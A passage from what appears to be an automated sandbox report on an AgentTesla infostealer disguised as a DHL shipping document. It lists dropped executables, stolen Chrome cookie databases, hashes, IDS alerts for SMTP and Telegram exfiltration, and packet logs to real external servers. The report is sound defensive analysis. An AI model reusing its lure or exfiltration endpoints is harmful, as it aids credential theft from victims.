                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:1

                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xspq5tuh.2qh.ps1

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1
                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:1

                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yifvoimj.dzm.psm1

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1
                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:1

                                                                                                                                            C:\Users\user\AppData\Local\explorers.exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\DHL_Shipping_Document2.exe
                                                                                                                                            File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2802176
                                                                                                                                            Entropy (8bit):5.761784045620971
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24576:OJKVeYMXiBAYFt0lGAQ3sO62gUXF0ktL8H/00890EMwEBUKtu1Dze6HDpLIbYBCd:QYYmVZL8sH9jJWCT9DG8xCCK
                                                                                                                                            MD5:E2F0B0AFE1D1CABE6D0FC082FADDE43F
                                                                                                                                            SHA1:8AB34B84B1475D03BEDA51C79F841EC98E97E350
                                                                                                                                            SHA-256:9080FC157A688B3946BB805B004DA99EBF4415BA1D9B46E3DAC43A6F02DD11C3
                                                                                                                                            SHA-512:B9A2C370C16398EE96E1E0855E8351D521403BE9CC03CE7F381A66CA183317744CD30F312CFBC625199A473AC7D10B146D435EB97F825A710AFF8D33B276011F
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......d..................)...........*.. ....@...... ....................... +...........`...@......@............... ........................*.W.... *.4.....................+...................................................... ............... ..H............text.....).. ....)................. ..`.rsrc...4.... *.......).............@..@.reloc........+.......*.............@..B..*.....H.........).........F...h1....)..........................................0...........(.....-.+.(!...+.*..0..........s.....-.&+......+.*..0..-.......(....,...s%....-.&+.(....+.*...-.&&+.(....+.*....0..0.......(....,....s?....-.&+.(....+.*....-.&&&+.(....+.*.0..#.......(....,..s3....-.&+.(....+.*.(....&*..0..*.......(....,..sV....-.&+.(....+.*..-.&+.(....+.*...0..,.......(....,..sG....-.&+.(....+.*...-.&&+.(....+.*.0..-.......(....,...s6....-.&+.(....+.*...-.&&+.(....+.*....0..

                                                                                                                                            C:\Users\user\AppData\Local\explorers.exe:Zone.Identifier

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\DHL_Shipping_Document2.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):26
                                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                            C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):171520
                                                                                                                                            Entropy (8bit):6.183577945077043
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:VMzcHTOLfqdPUhGArLfCd4PxZGSXN7+WYEJily6yIFHP6tAbVAAr34uNK:VQcTYfqdPUhGArLfCs7G3E6jJpAs4C
                                                                                                                                            MD5:B1DFD2B85A645040D8C89D0FCED4340A
                                                                                                                                            SHA1:B7363F57984D1853255075D6D0C59488A4764EB7
                                                                                                                                            SHA-256:7091EDED4BED4BF6C218D839FF5E3C98A01119311BC9AEDEABFD48502D3D3E62
                                                                                                                                            SHA-512:A139FDD4836C46FFAB5FC5234AD58592F9A3C175D6F0D3B5223A9D9321621B136C3288F2F24ABC12E0669084E88B5D87B4C68D68DFD75AD4D76EFE9460E8349D
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z..d..............0.................. ........@.. ....................................@.................................l...O.......F............................................................................ ............... ..H............text....... ...................... ..`.rsrc...F...........................@..@.reloc..............................@..B........................H........................................................................0..I.........+B.....,.(...........,. ....(...........,.(...........,.........,.+.+.*..(....*....0............8.........,*(....~....-........s.........~....o....&.......,.(...........,*(....~....-........s.........~....o....&.......,.sQ................,.~....o_...........,.s^................,.~....oR..........,.~....,+.......,.~....,........,..........,.+.8....*.0..(.........+!.....,.(+..........,........

                                                                                                                                            C:\Users\user\AppData\Roaming\ge5v1lvf.vjn\Chrome\Default\Network\Cookies

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):28672
                                                                                                                                            Entropy (8bit):1.4755077381471955
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
                                                                                                                                            MD5:DEE86123FE48584BA0CE07793E703560
                                                                                                                                            SHA1:E80D87A2E55A95BC937AC24525E51AE39D635EF7
                                                                                                                                            SHA-256:60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
                                                                                                                                            SHA-512:65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Roaming\n3wcaadv.hr4\Chrome\Default\Network\Cookies

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\Lutyzivrgpnlssvvvftlfile.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):28672
                                                                                                                                            Entropy (8bit):1.4755077381471955
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
                                                                                                                                            MD5:DEE86123FE48584BA0CE07793E703560
                                                                                                                                            SHA1:E80D87A2E55A95BC937AC24525E51AE39D635EF7
                                                                                                                                            SHA-256:60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
                                                                                                                                            SHA-512:65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Roaming\oizwscgo.1gz\Chrome\Default\Network\Cookies

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Roaming\KbWSe\KbWSe.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):28672
                                                                                                                                            Entropy (8bit):1.4755077381471955
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
                                                                                                                                            MD5:DEE86123FE48584BA0CE07793E703560
                                                                                                                                            SHA1:E80D87A2E55A95BC937AC24525E51AE39D635EF7
                                                                                                                                            SHA-256:60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
                                                                                                                                            SHA-512:65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            Static File Info

                                                                                                                                            General

                                                                                                                                            File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                            Entropy (8bit):5.761784045620971
                                                                                                                                            TrID:
                                                                                                                                            • Win64 Executable GUI Net Framework (217006/5) 47.53%
                                                                                                                                            • Win64 Executable GUI (202006/5) 44.25%
                                                                                                                                            • Win64 Executable (generic) Net Framework (21505/4) 4.71%
                                                                                                                                            • Win64 Executable (generic) (12005/4) 2.63%
                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.44%
                                                                                                                                            File name:DHL_Shipping_Document2.exe
                                                                                                                                            File size:2802176
                                                                                                                                            MD5:e2f0b0afe1d1cabe6d0fc082fadde43f
                                                                                                                                            SHA1:8ab34b84b1475d03beda51c79f841ec98e97e350
                                                                                                                                            SHA256:9080fc157a688b3946bb805b004da99ebf4415ba1d9b46e3dac43a6f02dd11c3
                                                                                                                                            SHA512:b9a2c370c16398ee96e1e0855e8351d521403be9cc03ce7f381a66ca183317744cd30f312cfbc625199a473ac7d10b146d435eb97f825a710aff8d33b276011f
                                                                                                                                            SSDEEP:24576:OJKVeYMXiBAYFt0lGAQ3sO62gUXF0ktL8H/00890EMwEBUKtu1Dze6HDpLIbYBCd:QYYmVZL8sH9jJWCT9DG8xCCK
                                                                                                                                            TLSH:BBD5ADB33187FECCD72F1D64D0182A509C101967476C9298FEC92A9F92E59A8EF9C5F0
                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......d..................)...........*.. ....@...... ....................... +...........`...@......@............... .....

                                                                                                                                            File Icon

                                                                                                                                            Icon Hash:eaee8e96b2a8e0b2

                                                                                                                                            Static PE Info

                                                                                                                                            General

                                                                                                                                            Entrypoint:0x6a020e
                                                                                                                                            Entrypoint Section:.text
                                                                                                                                            Digitally signed:false
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            Subsystem:windows gui
                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
                                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                            Time Stamp:0x64179CB4 [Sun Mar 19 23:37:24 2023 UTC]
                                                                                                                                            TLS Callbacks:
                                                                                                                                            CLR (.Net) Version:
                                                                                                                                            OS Version Major:4
                                                                                                                                            OS Version Minor:0
                                                                                                                                            File Version Major:4
                                                                                                                                            File Version Minor:0
                                                                                                                                            Subsystem Version Major:4
                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                            Entrypoint Preview

                                                                                                                                            Instruction
                                                                                                                                            dec eax
                                                                                                                                            mov eax, dword ptr [00402000h]
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            jmp eax
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al

                                                                                                                                            Data Directories

                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x2a01b40x57.text
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x2a20000xd834.rsrc
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x2b00000xc.reloc
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                            Sections

                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                            .text0x20000x29e21a0x29e400unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                            .rsrc0x2a20000xd8340xda00False0.08961080848623854data3.8147209986691957IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                            .reloc0x2b00000xc0x200False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                            Resources

                                                                                                                                            NameRVASizeTypeLanguageCountry
                                                                                                                                            RT_ICON0x2a21300xd228Device independent bitmap graphic, 101 x 256 x 32, image size 51712, resolution 9055 x 9055 px/m
                                                                                                                                            RT_GROUP_ICON0x2af3580x14data
                                                                                                                                            RT_VERSION0x2af36c0x314data
                                                                                                                                            RT_MANIFEST0x2af6800x1b4XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators

                                                                                                                                            Imports

                                                                                                                                            DLLImport
                                                                                                                                            mscoree.dll_CorExeMain

                                                                                                                                            Network Behavior

                                                                                                                                            Snort IDS Alerts

                                                                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                            192.168.2.3208.91.199.225496995872840032 03/20/23-11:34:28.478393TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249699587192.168.2.3208.91.199.225
                                                                                                                                            192.168.2.3208.91.198.143497045872851779 03/20/23-11:35:14.897311TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49704587192.168.2.3208.91.198.143
                                                                                                                                            192.168.2.3208.91.198.143497045872840032 03/20/23-11:35:14.897311TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249704587192.168.2.3208.91.198.143
                                                                                                                                            192.168.2.3208.91.199.225497035872840032 03/20/23-11:35:13.114104TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249703587192.168.2.3208.91.199.225
                                                                                                                                            192.168.2.3208.91.199.223496985872851779 03/20/23-11:34:24.041449TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49698587192.168.2.3208.91.199.223
                                                                                                                                            192.168.2.3208.91.198.143497025872851779 03/20/23-11:35:12.738289TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49702587192.168.2.3208.91.198.143
                                                                                                                                            192.168.2.3208.91.199.225496995872851779 03/20/23-11:34:28.478393TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49699587192.168.2.3208.91.199.225
                                                                                                                                            192.168.2.3208.91.199.225497035872030171 03/20/23-11:35:13.113999TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49703587192.168.2.3208.91.199.225
                                                                                                                                            192.168.2.3208.91.199.223497055872840032 03/20/23-11:35:15.831914TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249705587192.168.2.3208.91.199.223
                                                                                                                                            192.168.2.3208.91.199.223496985872840032 03/20/23-11:34:24.041449TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249698587192.168.2.3208.91.199.223
                                                                                                                                            192.168.2.3208.91.198.143497025872030171 03/20/23-11:35:12.738168TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49702587192.168.2.3208.91.198.143
                                                                                                                                            192.168.2.3208.91.199.223497055872030171 03/20/23-11:35:15.831914TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49705587192.168.2.3208.91.199.223
                                                                                                                                            192.168.2.3208.91.199.223497055872851779 03/20/23-11:35:15.831914TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49705587192.168.2.3208.91.199.223
                                                                                                                                            192.168.2.3208.91.199.225496995872030171 03/20/23-11:34:28.478287TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49699587192.168.2.3208.91.199.225
                                                                                                                                            192.168.2.3208.91.199.225497035872851779 03/20/23-11:35:13.114104TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49703587192.168.2.3208.91.199.225
                                                                                                                                            192.168.2.3208.91.198.143497045872030171 03/20/23-11:35:14.897278TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49704587192.168.2.3208.91.198.143
                                                                                                                                            192.168.2.3208.91.199.223496985872030171 03/20/23-11:34:24.041330TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49698587192.168.2.3208.91.199.223
                                                                                                                                            192.168.2.3208.91.198.143497025872840032 03/20/23-11:35:12.738289TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249702587192.168.2.3208.91.198.143

                                                                                                                                            Network Port Distribution

                                                                                                                                            TCP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Mar 20, 2023 11:34:04.680804968 CET49697443192.168.2.3173.231.16.76
                                                                                                                                            Mar 20, 2023 11:34:04.680874109 CET44349697173.231.16.76192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:04.680977106 CET49697443192.168.2.3173.231.16.76
                                                                                                                                            Mar 20, 2023 11:34:04.764014959 CET49697443192.168.2.3173.231.16.76
                                                                                                                                            Mar 20, 2023 11:34:04.764056921 CET44349697173.231.16.76192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:05.419517994 CET44349697173.231.16.76192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:05.419630051 CET49697443192.168.2.3173.231.16.76
                                                                                                                                            Mar 20, 2023 11:34:05.424472094 CET49697443192.168.2.3173.231.16.76
                                                                                                                                            Mar 20, 2023 11:34:05.424499035 CET44349697173.231.16.76192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:05.425107956 CET44349697173.231.16.76192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:05.564618111 CET49697443192.168.2.3173.231.16.76
                                                                                                                                            Mar 20, 2023 11:34:05.707492113 CET49697443192.168.2.3173.231.16.76
                                                                                                                                            Mar 20, 2023 11:34:05.707551956 CET44349697173.231.16.76192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:05.970412970 CET44349697173.231.16.76192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:06.064398050 CET44349697173.231.16.76192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:06.064754963 CET49697443192.168.2.3173.231.16.76
                                                                                                                                            Mar 20, 2023 11:34:06.066046953 CET49697443192.168.2.3173.231.16.76
                                                                                                                                            Mar 20, 2023 11:34:21.968075991 CET49698587192.168.2.3208.91.199.223
                                                                                                                                            Mar 20, 2023 11:34:22.153086901 CET58749698208.91.199.223192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:22.153326988 CET49698587192.168.2.3208.91.199.223
                                                                                                                                            Mar 20, 2023 11:34:22.878103971 CET58749698208.91.199.223192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:22.878870964 CET49698587192.168.2.3208.91.199.223
                                                                                                                                            Mar 20, 2023 11:34:23.063564062 CET58749698208.91.199.223192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:23.063883066 CET58749698208.91.199.223192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:23.065187931 CET49698587192.168.2.3208.91.199.223
                                                                                                                                            Mar 20, 2023 11:34:23.258714914 CET58749698208.91.199.223192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:23.260112047 CET49698587192.168.2.3208.91.199.223
                                                                                                                                            Mar 20, 2023 11:34:23.451380968 CET58749698208.91.199.223192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:23.451690912 CET49698587192.168.2.3208.91.199.223
                                                                                                                                            Mar 20, 2023 11:34:23.637947083 CET58749698208.91.199.223192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:23.638286114 CET49698587192.168.2.3208.91.199.223
                                                                                                                                            Mar 20, 2023 11:34:23.848236084 CET58749698208.91.199.223192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:23.851207018 CET49698587192.168.2.3208.91.199.223
                                                                                                                                            Mar 20, 2023 11:34:24.037393093 CET58749698208.91.199.223192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:24.041330099 CET49698587192.168.2.3208.91.199.223
                                                                                                                                            Mar 20, 2023 11:34:24.041449070 CET49698587192.168.2.3208.91.199.223
                                                                                                                                            Mar 20, 2023 11:34:24.041563034 CET49698587192.168.2.3208.91.199.223
                                                                                                                                            Mar 20, 2023 11:34:24.041614056 CET49698587192.168.2.3208.91.199.223
                                                                                                                                            Mar 20, 2023 11:34:24.225850105 CET58749698208.91.199.223192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:24.225893021 CET58749698208.91.199.223192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:24.360294104 CET58749698208.91.199.223192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:24.566260099 CET49698587192.168.2.3208.91.199.223
                                                                                                                                            Mar 20, 2023 11:34:26.123390913 CET49698587192.168.2.3208.91.199.223
                                                                                                                                            Mar 20, 2023 11:34:26.309504032 CET58749698208.91.199.223192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:26.309533119 CET58749698208.91.199.223192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:26.309673071 CET49698587192.168.2.3208.91.199.223
                                                                                                                                            Mar 20, 2023 11:34:26.309797049 CET49698587192.168.2.3208.91.199.223
                                                                                                                                            Mar 20, 2023 11:34:26.494208097 CET58749698208.91.199.223192.168.2.3
                                                                                                                                            Mar 20, 2023 11:34:26.842420101 CET49699587192.168.2.3208.91.199.225
